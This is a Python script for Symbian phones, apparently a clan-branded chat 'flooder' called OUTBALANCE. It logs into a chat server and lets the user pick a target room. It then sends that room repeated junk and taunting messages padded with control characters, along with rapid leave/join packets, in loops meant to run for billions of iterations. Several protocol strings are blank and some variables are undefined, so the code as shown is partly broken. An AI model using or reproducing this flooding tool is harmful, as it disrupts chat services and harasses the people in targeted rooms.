# Arvana Software # Padang Community import appuifw import e32 import base64 import miso import random import time import socket import globalui appuifw.app.screen = 'normal' round = appuifw.Text() appuifw.app.body = round appuifw.app.title = u'OUTBALANCE' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def _bodytext_(): round.style = appuifw.HIGHLIGHT_ROUNDED appuifw.note(u'PRIVATE APPLICATION OUTBALANCE', 'conf') round.color = 0 round.font = (u'LatinBold19', 12, None) round.set(u'OUTBALANCE') round.color = 0 round.font = (u'LatinBold15', 12, None) round.add(u'\nMODIFIED UPGRADE by: QC SERVER \nDedicated to: QC CLAN') round.color = 995694 round.font = (u'Latin11', 7, None) round.add(u'\n\n ENTER OUTBALANCE ') round.color = 0 round.font = (u'LatinBold15', 12, None) round.add(u'\n\nCopyrights @ 2012 - 2013 \nVISIT HTTP://server47.Mobie.in') join = '' chat = "' jxmlmsg1 = '' jxmlmsg2 = "" jxmlmsg4 = '' jmsg1a = '[b10 tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :Dtnt :D ' jmsg1b = '[c0c [b10 tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D :D [b10 tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D by: [b10 GWU SERVER' jmsg2 = 'mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg3 = '[00 cmMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg4 = '[0cc mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg5 = '[0c0 mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg6 = '[cc0 mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg7 = '[c70 mmmmmmmmmmmmmmC mmmmmmmmmmmmmmO mmmmmmmmmmmmmmD mmmmmmmmmmmmmmE mmmmmmmmmmmmmm4 mmmmmmmmmmmmmm7' jmsg8 = '[c00 mmmmmmmmmmmmmmC mmmmmmmmmmmmmmO mmmmmmmmmmmmmmD mmmmmmmmmmmmmmE mmmmmmmmmmmmmm4 mmmmmmmmmmmmmm7' jmsg9 = '[0d0 mmmmmmmmmmmmmmC mmmmmmmmmmmmmmO mmmmmmmmmmmmmmD mmmmmmmmmmmmmmE mmmmmmmmmmmmmm4 mmmmmmmmmmmmmm7' jmsg10 = '[444 mmmmmmmmmmmmmmC mmmmmmmmmmmmmmO mmmmmmmmmmmmmmD mmmmmmmmmmmmmmE mmmmmmmmmmmmmm4 mmmmmmmmmmmmmm7' jmsg11 = '[c00 sentinel [000 joins the chat. [000 sentinel will be kick out of the room.' jmsg12 = '[c00 sentinel [000 leaves the chat. :D: [c00 ka tanga na kick tnt tawag m0d p0tah :D tnt :D tnt :D tnt :D tnt :D tnt ' jmsg13 = '[a95 mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:o \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:D mMmMmMm\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f:) \x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7f\x7fmMmMmMm:(' jmsg14a = '[b10 tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :Dtnt :D [b10 Flood Time: ' jmsg14b = '[c00 [b10 tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :D tnt :Dtnt :D QUALITY CONTROL CLAN ]' def uconnect(): uid = appuifw.query(u'Username', 'text') upass = appuifw.query(u'Password', 'text') encrypt = (base64.encodestring(('\x00%s\x00%s' % (uid, upass)))[0 : -1]).decode('utf-8') loginxml = '' spacket2 = (loginxml + encrypt + '') spacket1 = '' spacket3 = '' spacket4 = 'Kolipri' round.font = (u'LatinBold15', 12, None) round.set(u'*OUTBALANCE* \nMODIFIED UPGRADE: QC SERVER \nVisit http://server47.Mobie.in') round.font = (u'LatinBold15', 12, None) round.add(u'\n\n Your account has been loading') server = '' port = 25 s.connect((server, port)) round.set(u'*OUTBALANCE* \nMODIFIED UPGRADE by: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.font = (u'LatinBold15', 12, None) round.add(u'\n\n Your account has been AUTHENTICATING') s.send(spacket1) rpacket4 = s.recv(1024) print rpacket4, s.send(spacket2) rpacket4a = s.recv(1024) print rpacket4a, e32.ao_sleep(1) ivp = '' if str.endswith(str(rpacket4a), str(ivp)) : miso.compress_all_heaps() round.set(u'*OUTBALANCE* \nMODIFIED UPGRADE by: SERVER \nVISIT HTTP://SERVER47.Mobie.In') appuifw.note(u'\nIncorrect password!', 'error') e32.ao_sleep(0.8) round.add(u'Password entered incorrect!') else : s.send(spacket3) rpacket4 = s.recv(1024) print rpacket4, s.send(spacket4) rpacket4 = s.recv(1024) print rpacket4, e32.ao_sleep(1) inxml1 = '' pmxml3 = '' aut = (pmxml1 + pmxml2 + uid + xcc + upass + pmxml3) s.send(aut) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.add(u'\n\n Your account has been INITIALIZING') e32.ao_sleep(1) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') e32.ao_sleep(1) round.add(u'\n\n Your account has now online') appuifw.app.menu = menu2 def ujoin(): rnn = appuifw.query(u'Nick (8 chars):', 'text') rn = appuifw.query(u'Set Target', 'text') rn1 = "'" rnn1 = "'" rnna = ' ' crs = '~' xz = time.strftime('[137 %I:%M %p[c70 :%A[70b :%B %d, %Y') xy = time.strftime('[137 [%I:%M %p') jpost1 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg1a + xz + jmsg1b + jxmlmsg4) jpost2 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg2 + jxmlmsg4) jpost3 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg3 + jxmlmsg4) jpost4 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg4 + jxmlmsg4) jpost5 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg5 + jxmlmsg4) jpost6 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg6 + jxmlmsg4) jpost7 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg7 + jxmlmsg4) jpost8 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg8 + jxmlmsg4) jpost14 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg9 + jxmlmsg4) jpost9 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg10 + jxmlmsg4) jpost10 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg11 + jxmlmsg4) jpost11 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg12 + jxmlmsg4) jpost12 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg13 + jxmlmsg4) jpost13 = (jxmlmsg1 + jxmlmsg2 + rn + jxmlmsg3 + jmsg14a + xy + jmsg14b + jxmlmsg4) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.add(u'\n\n') round.add(rn) round.font = (u'LatinBold15', 12, None) round.add(u'\n\nPress option to start') def fflood(): round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.add(u'\n\nJoining Room \n') round.add(rn) joining() def joining(): round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.add(u'\nJoining Room ') round.add(rn) joinroom = ((join + chat + rn + rn1 + nick + rnn + rnna) + str(random.randint(10, 999)) + crs + rnn1 + role) s.send(joinroom) ful = "" ban = "" e32.ao_sleep(1.5) abc1 = s.recv(1054) if str.endswith(str(abc1), str(ban)) : miso.compress_all_heaps() round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.font = (u'LatinBold12', 7, None) round.add(u'\n\nID Status [BANNED]') e32.ao_sleep(1) else : joininga() def joininga(): round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.add(u'\n\nJoining Room ') round.add(rn) joinroom = ((join + chat + rn + rn1 + nick + rnn + rnna) + str(random.randint(10, 999)) + crs + rnn1 + role) s.send(joinroom) ful = "" e32.ao_sleep(1) abc = s.recv(1054) if str.endswith(str(abc), str(ful)) : miso.compress_all_heaps() round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.font = (u'LatinBold12', 7, None) round.add(u'\nRoom Status [FULL]') e32.ao_sleep(1) joininga() else : round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') round.font = (u'LatinBold12', 7, None) round.add(u'\n\n\nStatus (Active)') flooda() def flooda(): i = 0 while i < 10000000000 : joinroom = ((join + chat + rn + rn1 + nick + rnn + rnna) + str(random.randint(10, 999)) + crs + rnn1 + role) joinrooma = ((join + chat + rn + rn1 + nick + rnn + rnna) + str(random.randint(10, 999)) + crs + rnn1 + role) lroom = (xmleave1 + xmleave2 + rn + xmleave4) e32.ao_sleep(5) s.send(jpost1) e32.ao_sleep(4) s.send(jpost2) e32.ao_sleep(5) s.send(jpost3) e32.ao_sleep(3) s.send(jpost4) e32.ao_sleep(4) s.send(jpost5) e32.ao_sleep(5) s.send(jpost6) e32.ao_sleep(3) s.send(jpost7) miso.compress_all_heaps() s.send(lroom) s.send(joinrooma) e32.ao_sleep(5) s.send(jpost8) e32.ao_sleep(5) s.send(jpost9) e32.ao_sleep(5) s.send(jpost10) e32.ao_sleep(4) s.send(jpost11) e32.ao_sleep(5) s.send(jpost12) e32.ao_sleep(3) s.send(jpost13) e32.ao_sleep(5) s.send(jpost14) s.send(lroom) s.send(joinroom) miso.compress_all_heaps() i += 1 def sflood(): round.font = (u'LatinBold19', 7, None) round.set(u'*OUTBALANCE* \nMODIFIED: SERVER \nVISIT HTTP://SERVER47.Mobie.In') lroom = (xmleave1 + xmleave2 + rn + xmleave4) round.font = (u'LatinBold12', 7, None) round.add(u'\n\nYou are now leave the room') round.add(rn) i = 1 while i < 10000 : e32.ao_sleep(1) s.send(lroom) i += 1 appuifw.app.menu = menu3 menu3 = [(u'Start', fflood), (u'Leave', sflood), (u'Change Target', ujoin), (u'Exit', quit)] appuifw.app.menu = menu3 def about(): globalui.global_msg_query(u'For more application visit \nhttp://server47.Mobie.In \nCreated by: SERVER \nDedicated to: QC CLAN \n FOR MORE INFO HANAPIN LNG AQ SA GAMERS 20', u'END') def quit(): exitapp = appuifw.query(u'upgrade by:', 'SERVER') if exitapp == 1 : globalui.global_note(u'3 . . . ') globalui.global_note(u'2 . . . ') globalui.global_note(u'1 . . . ') globalui.global_note(u'http://server47.mobie.in') appuifw.app.set_exit() menu1 = [(u'Log in', uconnect), (u'About', about), (u'Exit', quit)] menu2 = [(u'Set Target', ujoin), (u'About', about), (u'Exit', quit)] appuifw.app.menu = menu1 _bodytext_() appuifw.app.exit_key_handler = quit app_lock = e32.Ao_lock() app_lock.wait()